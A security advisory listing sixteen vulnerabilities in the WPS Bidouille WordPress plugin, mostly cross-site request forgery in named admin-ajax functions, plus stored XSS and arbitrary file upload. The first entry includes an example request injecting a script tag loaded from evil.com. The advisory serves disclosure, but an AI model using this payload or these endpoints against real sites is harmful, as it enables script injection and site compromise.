SB2019072406 - Multiple vulnerabilities in WPS Bidouille plugin for WordPress
Published: July 24, 2019
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 16 secuirty vulnerabilities.
1) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "count_notif()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
Example:
https://example.com/wp-admin/admin-ajax.php?action=count_notif with param “number” value “<script src=//evil.com/js.js></script>“
2) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "dismiss_admin_notice()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
Example:
https://example.com/wp-admin/admin-ajax.php?action=dismiss_admin_notice with param “number” and/or “option_name” and/or “dismissible_length”.
3) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "add_option_wps_display()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
4) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "delete_option_wps_display()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
5) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "add_allow_repair_wp_config()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
6) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "remove_allow_repair_wp_config()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
7) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "wpsbidouille_rated()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
8) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "download_log_template_redirect()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
9) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "download_report_system_template_redirect()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
10) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "delete_unuse_plugins()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
11) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "delete_unuse_themes()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
12) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "wp_ajax_save_settings_wps()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
13) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "wps_get_posts()" function in "/classes/plugin.php" file. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
14) Cross-site request forgery (CVE-ID: N/A)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists in the "/classes/removefromcache.php" file due to the nonce token is not verified if we don’t send "$_POST['wps_cache_fields']" . A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.15) Stored cross-site scripting (CVE-ID: N/A)
The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "/classes/plugin.php" file . A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website.
Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.
16) Arbitrary file upload (CVE-ID: N/A)
The vulnerability allows a remote attacker to compromise vulnerable system.
The vulnerability exists due to insufficient validation of file uploads in the "/classes/suggest-plugins-themes.php" file. A remote administrator can change the URL that will be passed in the uploader of "download_package()" and upload and execute arbitrary file on the server.
Remediation
Install update from vendor's website.